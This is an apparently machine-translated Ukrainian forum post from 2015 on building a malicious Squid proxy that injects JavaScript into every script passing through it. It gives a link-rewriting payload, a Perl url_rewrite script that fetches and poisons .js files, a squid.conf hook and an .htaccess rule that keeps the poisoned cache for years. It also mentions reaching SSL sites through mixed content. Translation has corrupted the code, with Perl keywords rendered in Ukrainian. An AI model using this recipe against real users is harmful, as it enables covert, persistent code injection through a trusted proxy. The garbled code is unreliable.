Цей допис востаннє редагував Мо Сяовень 2015-6-7 23:19
Це можна зробити, просто змінивши конфігурацію SQUID
Що таке SQUID?
Squid — це програмне забезпечення, яке кешує інтернет-дані, отримує запити на завантаження від користувачів і автоматично обробляє завантажені дані. Коли користувач хоче завантажити головну сторінку, він може надіслати запит Squid, попросити Squid завантажити його від його імені, потім Squid підключається до сайту і запитує головну сторінку, а потім надсилає головну сторінку користувачу, зберігаючи резервну копію; коли інші користувачі подають заявку на ту ж сторінку, Squid одразу надсилає збережену резервну копію, щоб користувач відчув, що швидкість досить швидка. Squid може проксити протоколи, такі як HTTP, FTP, GOPHER, SSL і WAIS, а Squid може обробляти це автоматично, а ви можете налаштувати Squid відповідно до своїх потреб для фільтрації небажаного.
Squid може працювати в багатьох операційних системах, таких як AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2 тощо.
Реалізація дуже проста:
1. Встановити Squid на один сервер Linux.
2. Модифікувати код сервера, вставити частину нашого коду у весь переданий javascrip і надіслати його.
3. Встановіть час кешу нашого зміненого js-файлу якомога вище.
Цей метод також застосовується до сайтів із увімкненим SSL: якщо сайт завантажує незахищений ресурс (наприклад, jquery для HTTP-сайту), більшість браузерів видадуть попередження, але мало хто звертає на це увагу.
Chema сказав, що понад 5 000 людей скористалися його проксі через кілька днів після його випуску, і більшість людей використовували його для шкідливих речей, бо вони користувалися проксі, тому вважали його анонімним і безпечним, але ніколи не очікували, що проксі-сервер теж зробить погані речі.
Зробіть свій шкідливий проксі-сервер
Якщо у вас вже є проксі-сервер Squid, вам також знадобиться веб-сервер, наприклад Apache.
Крок 1 Створення корисного навантаження
Я використовую простий скрипт як демонстрацію, щоб вказати всі гіперпосилання на свій сайт.
/etc/squid/payload.js
[mw_shl_code=javascrip видалити t, true]for(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
Крок 2: Напишіть скрипт для зараження всіх JS-файлів
/etc/squid/poison.pl
[mw_shl_code=perl, правда]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
поки (<>)
{
чомп $_;
if($_ =- /(.*.js)/i)
{
$url = $1;
system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
system("chmod o+r /var/www/tmp/$pid-$count.js");
system("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
друк «http://127.0.0.1:80/tmp/$pid-$count.js»;
}
інше
{
надрукувати "$_";
}
$count++;
}[/mw_shl_code]
Цей скрипт використовує wget, щоб отримати оригінальний javascrip сторінки і видалити t-файл, потім додати код у /etc/squid/payload.js і надіслати змінений файл клієнту, а вам потрібно створити каталог /var/www/tmp і дозволити squid записувати файли в ньому. Цей каталог зберігає змінені js-файли.
Крок 3: Поєднайте вищезазначений сценарій із Squid
Додайте це в /etc/squid/squid.conf
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Крок 4: Зробіть кеш ніколи не збоєм
/var/www/tmp/.htaccess
[mw_shl_code=html, правда] ExpiresActive On
ExpiresDefault "доступ плюс 3000 днів"[/mw_shl_code]
Це скаже Apache дати йому тривалий термін придатності, поки користувач не очистить свій кеш.
Якщо ви підключите цей проксі, клікання на будь-яке гіперпосилання перенаправить вас на мій сайт, і кеш залишиться навіть якщо ви не скористаєтеся проксі пізніше. Я щойно використав неагресивне корисне навантаження, і з таким методом хакери можуть робити набагато більше. Тож нагадуйте собі та друзям бути обережними з використанням безкоштовних проксі.
|
Опубліковано 19.01.2015 02:34:56
|
|
|
|
Опубліковано 19.01.2015 08:48:45
|
Орендодавець|
Опубліковано 20.01.2015 14:36:06
|
